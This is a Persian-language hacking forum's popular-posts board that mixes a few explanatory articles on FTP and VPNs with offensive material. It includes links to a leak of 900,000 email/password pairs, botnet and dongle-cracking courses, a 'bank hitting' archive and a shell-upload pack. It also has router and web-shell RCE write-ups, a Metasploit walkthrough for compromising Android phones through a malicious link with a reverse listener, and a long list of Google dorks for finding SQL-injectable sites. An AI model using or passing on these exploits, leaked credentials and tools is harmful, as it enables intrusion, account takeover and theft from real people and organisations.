رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

تخته امتیازات


مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز از زمان ۲۱/۰۱/۲۱ در همه بخش ها

  1. 5 امتیاز
    : نظر شخصی خودم برای کار کردن تو حوزه وب هکینگ اولین و مهم ترین پیش نیازش تسط به زبان های تحت وب هستش تا با نحوه ساختار سایت و شناسایی باگ ها آشنا بشی و خیلی از مفاهیم دیگه مثل دوره های شبکه و دوره هک اخلاقی و انواع راه های هک و تست نفوذ ، ابزار نویسی و کلی راه های دیگه که هر کدوم یه پیش نیازی میخواد و پس راه خیلی طولانی ولی موثری رو طی میکنی ! اینجا خیلی خیلی خلاصه گفتم اما بعدا راجبش یه تاپیک میزنم چون باید کلی راجبش بحث کرد امید وارم به دردت خورده باشه ، و به اون چیزی که میخوای برسی !
  2. 5 امتیاز
    @payam99 با عرض ادب و احترام برای ارزیابی امنیت و پیدا کردن آسیب پذیری متد های مختلف و روش هایی رو باید مورد ازمایش قرار دهید. برای مثال در مورد وبسایت باید وارد زیر مورد بررسی واقع شود: و برای نفوذ به یک وبسایت از چند طریق قابلیت اقدام و نفوذ میباشد: 1- نفوذ به صورت مستقیم از طریق وبسایت 2- نفوذ به صورت غیرمستقیم از طریق وبسایت های مشترک بر روی سرور 3- آنالیز سرور و بررسی ماژول ها و پکیج های نصب شده بر روی سرور اصلی که بخوایم هر مورد رو بصورت کامل بررسی کنیم خیلی طولانی خواهد شد. اما در روش اول شما میتوانید از طریق ابزارهای مختلف یا بصورت Manual شروع به انالیز پارامتر ها - ریکوئست ها - Header ها و تمامی موارد رو مورد بررسی قرار داده و در صورت هرگونه موارد مشکوک اقدام به تست انواع آسیب پذیری های احتمالی کرد. در مورد دوم نیازمند تست تمامی مراحل ذکر شده در یک وبسایت مشترک با سایت هدف میباشد و بعد از پیدا کردن آسیب پذیری و بهروری اسیب پذیری که منجر به گرفتن دسترسی از وبسایت مشترک خواهد شد و سپس اقدام به نفوذ به سرور جهت ایجاد دسترسی از سایت مورد نظر انجام شود. * مقالات استفاده از Acunetix - burp suite هم ببرسی نمایید.
  3. 5 امتیاز
    با سلام. کتاب جدید SQL Injection Strategies خدمت شما عزیزان: سال انتشار 2020 موفق باشید💓 SQL_Injection_Strategies-PDF.rar
  4. 4 امتیاز
    با سلام در راستای Booster File upload : <script src="https://s3-eu-west-1.amazonaws.com/boostera.assets/boostera.umd.js"></script> <script>  const options = {   uploadFinishedCallback: (info) => {console.log(info)},  }  const boostera = BoosteraUploadWidget(options); </script> HTML FILE PICKER. در صرافی های ایرانی نیز دیده شده است. 2020_Shell_Upload.zip
  5. 4 امتیاز
    بانک میزنیم Ruiner-iran-cyber.zip
  6. 4 امتیاز
    با سلام خدمت دوستان عزیز. یکی از راه هایی که که برای محاظت از نرم افزار انجام میدن استفاده از دانگل ها هستش.😒 تو این مجموعه سری آموزش با نحوه کرک کردن انواع دانگل های سخت افزاری آشنا میشید.😬 لینک دانلود: https://mega.nz/file/kypjyRja#F4D4T183WeyEG2_bu_nI_bfu3P7DoW-k55XdEvlYWeA رمز فایل: [email protected] موفق و سر بلند باشید 💚
  7. 4 امتیاز
    با سلام خدمت استاد عزیز . این برنامه به کمک متغیر های که براش تعریف شده مقدار بالانس بیت رو بهمون نشون میده ، فقط به دوستان پیشنهاد میکنم کسانی که از این برنامه میخوان استفاده کنن اینتیجر برنامه رو عوض کنن که مقدار بالانس رو به صورت x/yz نشون بده . محیط خروجی برنامه
  8. 4 امتیاز
    با سلام. کتاب جدید آموزش برپ سویت خدمت شما عزیزان:🍀 A Complete Guide to Burp Suite: Learn to Detect Application Vulnerabilities Pages: 175 Format: PDF Size: 10.1 MB Language: English Publication: 2021 موفق باشید: BurpSuite2021.rar
  9. 3 امتیاز
    سلام دوستان آرین چهرقانی هستم امروز با تحلیل آسیب پذیری Remote Code Execution از شل آلفا ( Tesla v4.1 ) درخدمت شما دوستان عزیز هستم. خب ، ما یه دوستی داشتیم که برامون یه شل از یه سروری فرستاد تا روش کار کنیم و تست بزنیم ... متاسفانه هیچ رمزی روی شل نبود و بعد از یکی دو روز که گذشت یا این دوست ما یا هرکسی دیگه ای اومد و رمز گذاشت روی شل و دسترسی ما رو یه جورایی قطع کرد ، درواقع شل خودش رو اپلود کرد و هیچ بکدوری هم درکار نبود. من برام قابل قبول نبود که یکی از در بیاد و دسترسی رو ازم بگیره ، برای همین رفتم سراغ شل دوست داشتنی و معروف آلفا تا یکمی هم انالیز کنم کداش رو هم اینکه یه راهی برای دور زدن رمز یا یه همچین چیزی پیدا کنم ، ( جدا از این بحث باید یادآور باشم ، این شل امسال توسط دوست عزیزم آقا سجاد مدیر کانال بیسکویت پدر | Biskooit Pedar دیکد شد و پخش شد ) خب دوستان ما توی ورژن های قبلی و ورژن جدید شل یک دایرکتوری رو مشاهده میکنیم با نام : ALFA_DATA البته تو ورژن های قبلی یا نبود یا یک اسم دیگه ای داشت ، داخل این دایرکتوری یک دایکتوری دیگه ای به نام alfacgiapi وجود داره و معمولا سه تا فایل داخلش قرار میگیره با نام های : bash.alfa & perl.alfa & py.alfa و این 3 فایل آسیب پذیر هستند . داخل این فایل ها با متد POST یک پارامتری با نام CMD گرفته شده که ورودی تبدیل شده از base64 رو دیکد میکنه و میره سمت سرور میخونه دستور رو ، و اونم به ما توی صفحه خروجی خودش رو برمیگردونه . ALFA TEAM SHELL TESLA 4.1 - Remote Code Execution (Unauthenticated) خب همینطور که تو تصویر مشاهده میکنید ما تونستیم دستورات خودمون رو به راحتی اجرا کنیم و شل خودمون اپلود کنیم. در نهایت هم اینو ثبت کردم که شما میتونید با این لینک بهش دسترسی داشته باشید : https://cxsecurity.com/issue/WLB-2021120083 امیدوارم که لذت برده باشید دوستان عزیزم 🌹 "با تشکر از گروه امنیتی ایران سایبر"
  10. 3 امتیاز
    فیلم آموزش ساخت بات نت به صورت کامل فقط لایک کامنتیادتون نره از ما حمایت کنید https://mega.nz/file/rJoDhSRC#IEHfyiINMTY2myrNcqkIO-bqUi7ndofLCn1DwtI38iI
  11. 3 امتیاز
    آسیب پذیری Remote Code Execution کشف شده از روتر های Seowon 130-SLC که توسط ( مبین نت | mobinet ) داره استفاده میشه این دفعه یه جور دیگه ای خودشو نشون داد ! در حال تست روتر بودم و متوجه شدم که بدون احراز هویت روی یکی از پارامتر های دیتای ارسالی ("queriesCnt" ) میشه دستوراتی رو وارد کرد و پاسخ رو با قالب xml در مروگر بدون احراز هویت ( admin ) دریافت کرد ! ارسال درخواست به سمت ip هدف و دریافت خروجی xml در مروگر همینطور که تو عکس بالا مشاهده میکنید من ip و port یکی از روتر ها رو اوردم و با متد Post این دیتا رو ارسال کردم و سمت چپ عکس ، هدف به من خروجی داده <xml> <log>uid=0(root) gid=0(root) </log></xml> در نهایت هم اینو ثبت کردم که شما میتونید با این لینک بهش دسترسی داشته باشید : https://www.exploit-db.com/exploits/50295 شناسه هایی با عنوان دسترسی ریموت برای این روتر ها ثبت شده که در دسترس هستند : https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-17456 امیدوارم که لذت برده باشید دوستان عزیزم 🌹 "با تشکر از گروه امنیتی ایران سایبر" نویسنده : آرین چهرقانی | Aryan Chehreghani
  12. 3 امتیاز
    بسم الله الرحمن الرحیم با سلام در این پست با اموزش Web Flag Simple SQL injection ابتدا بررسی میکنیم که به کوکی ها دسترسی داشته باشیم مقدار کلیدی مورد نیاز ما در برنامه اختصاص داده شده است که متغیر است <?php error_reporting(0); include_once("flag.php"); $cookie = $_COOKIE['ISecer']; if(isset($_GET['hint'])){ show_source(__FILE__); } elseif (unserialize($cookie) === "$KEY") { echo "$flag"; } else { ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Login</title> <link rel="stylesheet" href="admin.css" type="text/css"> </head> <body> <br> <div class="container" align="center"> <form method="POST" action="#"> <p><input name="user" type="text" placeholder="Username"></p> <p><input name="password" type="password" placeholder="Password"></p> <p><input value="Login" type="button"/></p> </form> </div> </body> </html> <?php } $KEY='ISecer:www.isecer.com'; ?> پس از تجزیه و تحلیل ، کوکی مورد نیاز برای ضدعفونی شدن برابر مقدار KEY است و سپس می توان پرچم را نشان داد. ابتدا یک قطعه کد php بنویسید ، سعی کنید KEY بعد از سریال سازی یک روش مبهم سازی بسیار قوی پیدا کنید نرم افزار Phpstudy را باز کرده _ ( وظیفه اصلی این نرم افزار ایجاد وب سایت با فایل php است ) فقط این فایل برنامه نویسی را مستقیماً در فهرست اصلی قرار دهید ، اکنون می توانید کوکی ها را مستقیماً وارد کنید. از Burp Suite استفاده کنید ، در ( Send to Repeater ) مقدار کوکی را وارد کنید ، پرچم بیرون می آید و تمام .
  13. 3 امتیاز
    با سلام خدمت دوستان عزیز انجمن ایران سایبر پس از 1 ماه غیرفعال بودن مجددا راه اندازی گردید و با توجه به تغییراتی که در مالکیت و انجمن صورت گرفته است لازم است یک سری توضیحات جهت مشخص کردن محور فعالیت انجمن اعلام نمایم. 1- مالکیت و فعالیت دامین و سایت تغییر کرده است و زین پس در حوزه امنیت - آموزش امنیت و شبکه - ارزیابی امنیت فعالیت مینماید. 2- هرگونه نفوذ به وبسایت های داخلی و خارجی خلاف قوانین بوده و در صورت مشاهده کاربر خاطی از سایت اخراج شده و مسئولیت هرگونه تخلف بر عهده شخص میباشد نه وبسایت . 3- هرگونه بی احترامی و توهین چه به اشخاص داخلی و خارجی ممنوع بوده و مسئولیت احتمالی برعهده شخص میباشد. 4- انجام هرگونه فعالیت سیاسی کاملا ممنوع میباشد. *** از این تاریخ ( 06/05/1400 ) ( 2021 - 28july ) به قبل تمامی مسئولیت فعالیت ها چه داخل سایت و انجمن و چه خارج از سایت و مسائل مربوط به آن مربوط به مدیریت و مالکیت قبل سایت بوده و مدیریت جدید و مالک جدید سایت عهده دار مسائل حقوقی و ... نمیباشد. با تشکر .
  14. 3 امتیاز
    درود این فایل حاوی 900 هزار ایمیل پسورد می باشد Pass: iran-cyber.net https://anonfile.com/lbU69bp7of/Canva.com_iran-cyber_zip
  15. 3 امتیاز
    learing Video And TOOLS CVE-2019-16759-master.zip
  16. 3 امتیاز
    BTC Wallet Private Keys Checker.zip
  17. 3 امتیاز
    به نام خدای بزرگ با سلام این کتاب رو چند وقت پیش خریداری کردم. حالا با شما دوستان اون رو به اشتراک میزارم. Metasploit-Advanced.rar
  18. 3 امتیاز
    به نام خدای بزرگ با سلام این ابزار برای بروت فورس اتوماتیک دایرکتوری ها در وب کاربرد داره. Goodi.rar
  19. 3 امتیاز
    FTP چیست؟ FTP (File Transfer Protocol) یک سرویس اینترنتی است که برای برقراری ارتباط با یک سرور خاص اینترنت یا رایانه طراحی شده است ، بنابراین کاربران می توانند پرونده ها را به کامپیوتر بفرستند (بارگیری) یا پرونده ها را به سرور بفرستند (بارگذاری). FTP در حال حاضر به طور گسترده ای برای تبادل داده ها مورد استفاده قرار می گیرد ، زیرا این کار ساده تر از استفاده از یک دستگاه سیمی یا فیزیکی است. امید است که با استفاده از این مقاله ، خوانندگان بتوانند درک کنند FTP چیست و چگونه از FTP برای انجام یک سرور از راه دور استفاده کنید. سرورهای از راه دور بدون نیاز به ورود به یک حساب میزبانی یا سرور خصوصی مجازی (VPS) برای مدیریت وب سایت ها بسیار مفید هستند. تاریخچه FTP قبل از بحث در مورد تاریخچه FTP ، من کمی در مورد رابطه Telnet با FTP توضیح خواهم داد. Telnet برای اتصال مستقیم (شبکه غیر مستقیم) استفاده می شود ، در حالی که FTP از اتصال غیرمستقیم استفاده می کند. این دو نوع اتصال TCP / IP دو مدل اصلی معرفی شده هستند. اتصال غیر مستقیم به معنای گرفتن منابع از میزبان از راه دور و استفاده از آنها در سیستم محلی است. سپس آنها را دوباره به میزبان از راه دور منتقل کنید. اولین استاندارد FTP RFC 114 بود که در سال 1971 ، حتی قبل از وجود TCP و IP صادر شد. این استاندارد برای تعریف دستورات اساسی مورد استفاده برای برنامه ریزی یک سیستم ارتباطی که می خواهد از آن استفاده کند ، استفاده می شود. پروتکل FTP مورد استفاده برای استانداردهای اینترنت توسط کمیته ویژه مهندسی اینترنت به عنوان مجموعه ای از اسناد رسمی RFC (درخواست نظر) تهیه شده است. FTP با این هدف ایجاد شده است که کاربران می توانند پرونده ها را از یک مکان به مکان دیگر منتقل کنند. مانند اکثر پروتکل های TCP / IP ، این مدل بر اساس مدل سرویس گیرنده / سرور است. توابع سرور FTP و موارد استفاده FTP چندین توابع FTP وجود دارد که در حال حاضر به طور گسترده مورد استفاده قرار می گیرند ، مانند آپلود صفحات وب به اینترنت از طریق میزبانی وب. توابع دیگر مانند به روزرسانی نسخه های برنامه توسط توسعه دهنده برنامه FTP انجام می شود. به طور کامل ، در اینجا توابع FTP موجود است. بارگذاری صفحات وب سایت در یک سرور وب / میزبانی وب در اینترنت مرور و بارگیری پرونده ها از سایت های نرم افزار عمومی یک پرونده بزرگ را به دو قسمت تقسیم می کند که ممکن است برای پیوست در ایمیل بیش از حد بزرگ باشد بارگیری و بارگذاری محتوا ، مانند دوره های آموزشی در سرور FTP آخرین ویرایش برنامه را همانطور که توسط توسعه دهنده نرم افزار ساخته شده توزیع می کند البته نه تنها این ، توابع FTP بسیاری دیگری نیز وجود دارد که می تواند در انجام کارهای روزمره مورد استفاده قرار گیرد. می توانید خودتان آن را توسعه داده و متناسب با نیازهای مورد نیاز خود تنظیم کنید. با این حال ، اساساً عملکرد ساده FTP این است که کاربران می توانند پرونده ها را از یک مکان به مکان دیگر منتقل کنن همچنین بخوانید: آپلود فایل در هاست و دانلود فایل از هاست با پروتکل ftp و نرم افزار FileZilla
  20. 3 امتیاز
    گسترش اینترنت در دنیای امروز سبب به وجود آمدن شبکه های اینترنتی متفاوتی از جمله شبکه وایرلس شده است. شبکه های وایرلس بر خلاف شبکه های پیشین برای برقراری ارتباط با کامپیوترها و موبایل ها نیازمند کابل نمی باشند و جهت دریافت و ارسال دیتا از امواج رادیویی استفاده می کنند بنابراین برای کاربرانی که نیازمند استفاده از اینترنت قابل حمل هستند، بسیار کاربرد دارد. شبکه های وایرلس امکان استفاده از اینترنت را در همه جا ایجاد کرده است و تعداد وسیعی از افراد می توانند به راحتی در فضاهای کتابخانه، دانشگاه و … به اینترنت دسترسی داشته باشند. این عمومیت در دسترس پذیری اینترنت در شبکه های وایرلس سبب شده است بسیاری از افراد برای ایجاد فضایی امن، از شبکه مجازی اختصاصی یا به اختصار vpn ها استفاده کنند. با خرید vpn یا خرید فیلتر شکن ها می توان علاوه بر برقراری ارتباطی راحت در شبکه ها، از شبکه ای ایمن و سریع بهرمند شد. پس با خرید vpn می توان در شبکه گسترده وایرلس یک شبکه خصوصی برای چند کاربر به خصوص ایجاد کرد. آشنایی با vpn Vpn در واقع مسدود سازی ارتباطات بدون مجوز است همان طور که ویندوز ها نیازمند یک سری مسدودسازی ها هستند شبکه اینترنت هم به این قبیل محدودیت ها نیاز دارد. امروزه بسیار متداول است که فیلتر شکن یا vpn را یک عامل محدود کننده برای استفاده از فضای گسترده اینترنتی می دانند اما اینگونه نیست. درست است که برای عبور از فیلترینگ بسیاری از سایت ها به خرید vpn اقدام می کنیم اما بیشترین کاربرد آنها جهت ایجاد امنیت و خصوصی سازی در شبکه های گسترده ای همچون وایرلس است. باید دانست در هنگام استفاده از فیلتر شکن ها اطلاعات جستجوهای صورت گرفته به جای قرارگیری در ISP های شخصی در اختیار سازندگان vpn قرار می گیرد بنابراین نکته ای که بسیار حائز اهمیت است وجود امنیت در ساز و کارهای سازندگان vpn ها است. بنابراین می توان پیدا کردن یک vpn ایمن را کار مشکلی دانست زیرا به بخش اعظمی از اطلاعات شخصی می تواند دسترسی پیدا کند. گاها با هزینه کردن می توان با یک خرید فیلتر شکن کارآمد و ایمن علاوه بر حفظ حریم شخصی، امنیت فعالیت های فضای مجازی را نیز تضمین کرد. جهت ایجاد امنیت برای استفاده از فیلتر شکن ها بهتر است هنگام استفاده از آنها وارد پروتکل های HTTPS شد تا اطلاعات خصوصی در اختیار هکرها قرار نگیرد. در نهایت می توان گفت با خرید vpn علاوه بر بی معنا کردن مسافت ها در شبکه های وایرلس، می توان فارغ از دردسرهای پروتکل ها از امنیت بالا بهره برد. منبع مقاله: https://bit.ly/2MBDFep
  21. 3 امتیاز
    به نام خدای بزرگ با سلام یک ویدیو درباره ی این موضوع تهیه کردم. فکر نمی کنم که در داخل شبیه به این ویدیو موجود باشه. که شامل مراحل: فازینگ رونویسی eip مکان یابی آفست مربوطه چک کردن وضعیت پشته و آدرس برگشت ایجاد و هدایت شلکد در نهایت هم ایجاد اتصال برگشتی. من از پایتون برای این کار استفاده کردم به خاطر این که عمومی تره در داخل. ولی بهتر هست که از زبان روبی استفاده بشه و اکسپلویت هامون رو شبیه به یکسری ماژول های مستقل به متا اضافه کنیم. چون که متا دارای یکسری پیلود و انکودر خیلی خوب هست و با استفاده از اون ها می تونیم از مکانیزم های امنیتی به راحتی عبور کنیم. این هم اضافه کنم که آسیب پذیری های سری بافر اورفلو فقط بخشی از این مباحث هستش. این موضوعات خیلی گسترده تر از این حرف ها هستش. https://www.aparat.com/v/j0lxo
  22. 3 امتیاز
    با سلام میتونید از این برنامه استفاده کنید dvd-unlocker.zip
  23. 2 امتیاز
    به نام خداوند بخشنده مهربان سلام و خسته نباشید خدمت دوستان عزیز همینطوری که اطلاع دارید یک آسیب پذیری هسته وردپرس با شناسه و عنوان " CVE-2022-21661 : WordPress Core - SQL Injection " که در نسخه 5.8.2 قابلیت بهره برداری داشت به ثبت رسید و در نسخه 5.8.3 - Patch شد هسته وردپرس به دلیل راحتی به توسعه‌دهندگان اجازه میده تا پلاگین‌ها و تم‌هایی بسازن تا وب‌سایت‌ های خودشون رو مدیریت کنن ، توابعی را برای پلاگین/ موضوع برای فراخوانی و استفاده از توابعی که وردپرس ارائه کرده مثل : فرمت داده ، پرس و جو Database رو فراهم میکنه در بین کلاس هایی که wordpress ارائه کرده یک خطای SQL Injection را در کلاسی که WP برای پرس و جو از DB ارائه میده پیدا شده به نام : WP_Query تابع clean_query از get_sql_for_clause فراخوانی میشه با خوندن کد تابع مشاهده میکنیم وظیفه این تابع ایجاد بند برای شرط در یک پرس و جو SQL و به طور خاص وظیفش پردازش داده های دریافتی، ترکیب داده ها به یه شرط در پرس و جو SQL هست. بنابراین میتونیم داده های برگشتی این تابع رو کنترل کنیم . به این معنی که می‌تونیم کوئری SQL رو کنترل کنیم و SQL Injection انجام بدیم. - برای خوندن جزئیات بیشتر و پرامتر ها به لینک هایی که در آخر نوشته قرار میدم مراجعه کنید . CVE-2022-21661 : Exploit WordPress Core 5.8.2 - SQL Injection [+] 🕷️ اکسپلویت این آسیب پذیری برای اولین بار توسط بنده به ثبت رسید و شما میتونید با لینک های زیر بهش دسترسی داشته باشید : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661 https://nvd.nist.gov/vuln/detail/CVE-2022-21661 https://www.cvedetails.com/cve/CVE-2022-21661/ https://packetstormsecurity.com/files/165540/WordPress-Core-5.8.2-SQL-Injection.html https://www.exploit-db.com/exploits/50663 https://cxsecurity.com/issue/WLB-2022010068 https://0day.today/exploit/37226 نویسنده : آرین چهرقانی | Aryan Chehreghani امیدوارم که لذت برده باشید دوستان عزیزم 🌹 "با تشکر از گروه امنیتی ایران سایبر"
  24. 2 امتیاز
    سلام خدمت اساتید و دوستان گرامی، در این آموزش قصد داریم دستگاه اندرویدی را با فرستادن لینک آلوده هک کنیم. این روش برای دستگاه های اندرویدی(5 و 5.5) جواب میده. خب بریم سراغ دستورات: 1. دستور اول اکسپلویت خودمونو میسازیم: use exploit/android/browser/webview_addjavascriptinterface 2. با دستورات زیر آپشن های مورد نظر را ست میکنیم: show options set SRVHOST set SRVHOST xxx.xxx.x.x set URIPATH / set LHOST xxx.xxx.x.x set LPORT 8080 3. با دستور زیر اکسپلویت را ران میکنیم: run بعد از وارد کردن دستورات بالا،اکسپلویت ما با هاست و پورتی که مشخص کردیم،ست میشود. با این روش هم میتوان دستگاه های درون شبکه محلی را مورد نفوذ قرار داد هم دستگاه های خارج از شبکه محلی(روش هک دستگاه اندرویدی خارج از شبکه در تاپیک قبلی) * تارگت بعد از باز کردن لینک مخرب دسترسی را به ما میدهد. -- امیدوارم مفید واقع شده باشه 😊
  25. 2 امتیاز
    سلام خدمت دوستان عزیز، خیلی از دوستان براشون سوال پیش اومده که دسترسی گرفتن از دستگاه اندروید(تارگت)خارج از شبکه ممکن است یا نه؟ در جواب این سوال باید بگم میشه از دستگاه اندرویدی خارج از شبکه محلی خودمون دسترسی کامل بگیریم. برای این کار تنها نیاز به نصب سرویس ngrok بسته به سیستم عامل خودتون دارید. با نصب این سیستم دیگه نیازی به پورت فورواردینگ و این داستانا ندارید. برای نصب این سرویس،باید به سایت ngrok.com مراجعه کنید و طبق نوع سیستم عامل خودتون دانلود کنید. بعد از ثبت نام در این سایت به شما یک کلید فعال سازی میده که میتونید با اون کلید ngrok رو فعال کنید. اگه حمایت کنید از این پست حتما نحوه کار و راه اندازی کامل این سیستم رو بهتون میگم.😁
  26. 2 امتیاز
    باسلام خدمت بزرگان Google SQL Dorks – 2021 Here is the collection of Here is the Latest collection of Google SQL Dorks List Collection for SQL Injection 2021 view_items.php?id= home.php?cat= item_book.php?CAT= www/index.php?page= schule/termine.php?view= goods_detail.php?data= storemanager/contents/item.php?page_code= view_items.php?id= customer/board.htm?mode= help/com_view.html?code= n_replyboard.php?typeboard= eng_board/view.php?T****= prev_results.php?prodID= bbs/view.php?no= gnu/?doc= zb/view.php?uid= global/product/product.php?gubun= m_view.php?ps_db= productlist.php?tid= product-list.php?id= onlinesales/product.php?product_id= garden_equipment/Fruit-Cage/product.php?pr= product.php?shopprodid= product_info.php?products_id= productlist.php?tid= showsub.php?id= productlist.php?fid= products.php?cat= products.php?cat= product-list.php?id= product.php?sku= store/product.php?productid= products.php?cat= productList.php?cat= product_detail.php?product_id= product.php?pid= view_items.php?id= more_details.php?id= county-facts/diary/vcsgen.php?id= idlechat/message.php?id= podcast/item.php?pid= products.php?act= details.php?prodId= socsci/events/full_details.php?id= ourblog.php?categoryid= mall/more.php?ProdID= archive/get.php?message_id= review/review_form.php?item_id= english/publicproducts.php?groupid= news_and_notices.php?news_id= rounds-detail.php?id= gig.php?id= board/view.php?no= index.php?modus= news_item.php?id= rss.php?cat= products/product.php?id= details.php?ProdID= els_/product/product.php?id= store/description.php?iddesc= socsci/news_items/full_story.php?id= naboard/memo.php?bd= bookmark/mybook/bookmark.php?bookPageNo= board/board.html?table= kboard/kboard.php?board= order.asp?lotid= goboard/front/board_view.php?code= bbs/bbsView.php?id= boardView.php?bbs= eng/rgboard/view.php?&bbs_id= product/product.php?cate= content.php?p= page.php?module= ?pid= bookpage.php?id= cbmer/congres/page.php?LAN= content.php?id= news.php?ID= photogallery.php?id= index.php?id= product/product.php?product_no= nyheder.htm?show= book.php?ID= print.php?id= detail.php?id= book.php?id= content.php?PID= more_detail.php?id= content.php?id= view_items.php?id= view_author.php?id= main.php?id= english/fonction/print.php?id= magazines/adult_magazine_single_page.php?magid= product_details.php?prodid= magazines/adult_magazine_full_year.php?magid= products/card.php?prodID= catalog/product.php?cat_id= e_board/modifyform.html?code= community/calendar-event-fr.php?id= products.php?p= news.php?id= StoreRedirect.php?ID= subcategories.php?id= tek9.php? template.php?Action=Item&pid= topic.php?ID= tuangou.php?bookid= type.php?iType= updatebasket.php?bookid= updates.php?ID= view.php?cid= view_cart.php?title= view_detail.php?ID= viewcart.php?CartId= viewCart.php?userID= viewCat_h.php?idCategory= viewevent.php?EventID= viewitem.php?recor= viewPrd.php?idcategory= ViewProduct.php?misc= voteList.php?item_ID= whatsnew.php?idCategory= WsAncillary.php?ID= WsPages.php?ID=noticiasDetalle.php?xid= sitio/item.php?idcd= index.php?site= de/content.php?page_id= gallerysort.php?iid= docDetail.aspx?chnum= index.php?section= index.php?page= index.php?page= en/publications.php?id= events/detail.php?ID= forum/profile.php?id= media/pr.php?id= content.php?ID= cloudbank/detail.php?ID= pages.php?id= news.php?id= beitrag_D.php?id= content/index.php?id= index.php?i= ?action= index.php?page= beitrag_F.php?id= index.php?pageid= page.php?modul= detail.php?id= index.php?w= index.php?modus= news.php?id= news.php?id= aktuelles/meldungen-detail.php?id= item.php?id= obio/detail.php?id= page/de/produkte/produkte.php?prodID= packages_display.php?ref= shop/index.php?cPath= modules.php?bookid= view/7/9628/1.html?reply= product_details.php?prodid= catalog/product.php?pid= rating.php?id= ?page= catalog/main.php?cat_id= index.php?page= detail.php?prodid= products/product.php?pid= news.php?id= book_detail.php?BookID= catalog/main.php?cat_id= catalog/main.php?cat_id= default.php?cPath= catalog/main.php?cat_id= catalog/main.php?cat_id= category.php?catid= categories.php?cat= categories.php?cat= detail.php?prodID= detail.php?id= category.php?id= hm/inside.php?id= index.php?area_id= gallery.php?id= products.php?cat= products.php?cat= media/pr.php?id= books/book.php?proj_nr= products/card.php?prodID= general.php?id= news.php?t= usb/devices/showdev.php?id= content/detail.php?id= templet.php?acticle_id= news/news/title_show.php?id= product.php?id= index.php?url= cryolab/content.php?cid= ls.php?id= s.php?w= abroad/page.php?cid= bayer/dtnews.php?id= news/temp.php?id= index.php?url= book/bookcover.php?bookid= index.php/en/component/pvm/?view= product/list.php?pid= cats.php?cat= software_categories.php?cat_id= print.php?sid= about.php?cartID= accinfo.php?cartId= acclogin.php?cartID= add.php?bookid= add_cart.php?num= addcart.php? addItem.php add-to-cart.php?ID= addToCart.php?idProduct= addtomylist.php?ProdId= adminEditProductFields.php?intProdID= advSearch_h.php?idCategory= affiliate.php?ID= affiliate-agreement.cfm?storeid= affiliates.php?id= ancillary.php?ID= archive.php?id= article.php?id= phpx?PageID basket.php?id= Book.php?bookID= book_list.php?bookid= book_view.php?bookid= BookDetails.php?ID= browse.php?catid= browse_item_details.php Browse_Item_Details.php?Store_Id= buy.php? buy.php?bookid= bycategory.php?id= cardinfo.php?card= cart.php?action= cart.php?cart_id= news.php?id= aktuelles/meldungen-detail.php?id= item.php?id= obio/detail.php?id= page/de/produkte/produkte.php?prodID= packages_display.php?ref= shop/index.php?cPath= modules.php?bookid= product-range.php?rangeID= en/news/fullnews.php?newsid= deal_coupon.php?cat_id= show.php?id= blog/index.php?idBlog= redaktion/whiteteeth/detail.php?nr= HistoryStore/pages/item.php?itemID= aktuelles/veranstaltungen/detail.php?id= tecdaten/showdetail.php?prodid= ?id= rating/stat.php?id= content.php?id= viewapp.php?id= item.php?id= news/newsitem.php?newsID= FernandFaerie/index.php?c= show.php?id= ?cat= categories.php?cat= category.php?c= product_info.php?id= prod.php?cat= store/product.php?productid= browsepr.php?pr= product-list.php?cid= products.php?cat_id= product.php?ItemID= view-event.php?id= content.php?id= book.php?id= page/venue.php?id= print.php?sid= colourpointeducational/more_details.php?id= print.php?sid= browse/book.php?journalID= section.php?section= bookDetails.php?id= profiles/profile.php?profileid= event.php?id= gallery.php?id= category.php?CID= corporate/newsreleases_more.php?id= print.php?id= view_items.php?id= more_details.php?id= county-facts/diary/vcsgen.php?id= idlechat/message.php?id= podcast/item.php?pid= products.php?act= details.php?prodId= socsci/events/full_details.php?id= ourblog.php?categoryid= mall/more.php?ProdID= archive/get.php?message_id= review/review_form.php?item_id= english/publicproducts.php?groupid= news_and_notices.php?news_id= rounds-detail.php?id= gig.php?id= board/view.php?no= index.php?modus= news_item.php?id= rss.php?cat= products/product.php?id= details.php?ProdID= els_/product/product.php?id= store/description.php?iddesc= socsci/news_items/full_story.php?id= modules/forum/index.php?topic_id= feature.php?id= products/Blitzball.htm?id= profile_print.php?id= questions.php?questionid= html/scoutnew.php?prodid= main/index.php?action= ********.php?cid= ********.php?cid= news.php?type= index.php?page= viewthread.php?tid= summary.php?PID= news/latest_news.php?cat_id= index.php?cPath= category.php?CID= index.php?pid= more_details.php?id= specials.php?osCsid= search/display.php?BookID= articles.php?id= print.php?sid= page.php?id= more_details.php?id= newsite/pdf_show.php?id= shop/category.php?cat_id= shopcafe-shop-product.php?bookId= shop/books_detail.php?bookID= index.php?cPath= more_details.php?id= news.php?id= more_details.php?id= shop/books_detail.php?bookID= more_details.php?id= blog.php?blog= index.php?pid= prodotti.php?id_cat= category.php?CID= more_details.php?id= poem_list.php?bookID= more_details.php?id= content.php?categoryId= authorDetails.php?bookID= press_release.php?id= item_list.php?cat_id= colourpointeducational/more_details.php?id= index.php?pid= download.php?id= shop/category.php?cat_id= i-know/content.php?page= store/index.php?cat_id= yacht_search/yacht_view.php?pid= pharmaxim/category.php?cid= print.php?sid= specials.php?osCsid= store.php?cat_id= category.php?cid= displayrange.php?rangeid= product.php?id= csc/news-details.php?cat= products-display-details.php?prodid= stockists_list.php?area_id= news/newsitem.php?newsID= index.php?pid= newsitem.php?newsid= category.php?id= news/newsitem.php?newsID= details.php?prodId= publications/publication.php?id= purelydiamond/products/category.php?cat= category.php?cid= product/detail.php?id= news/newsitem.php?newsID= details.php?prodID= item.php?item_id= edition.php?area_id= page.php?area_id= view_newsletter.php?id= feedback.php?title= freedownload.php?bookid= fullDisplay.php?item= getbook.php?bookid= GetItems.php?itemid= giftDetail.php?id= help.php?CartId= home.php?id= index.php?cart= index.php?cartID= index.php?ID= info.php?ID= item.php?eid= item.php?item_id= item.php?itemid= item.php?model= item.php?prodtype= item.php?shopcd= item_details.php?catid= item_list.php?maingroup item_show.php?code_no= itemDesc.php?CartId= itemdetail.php?item= itemdetails.php?catalogid= 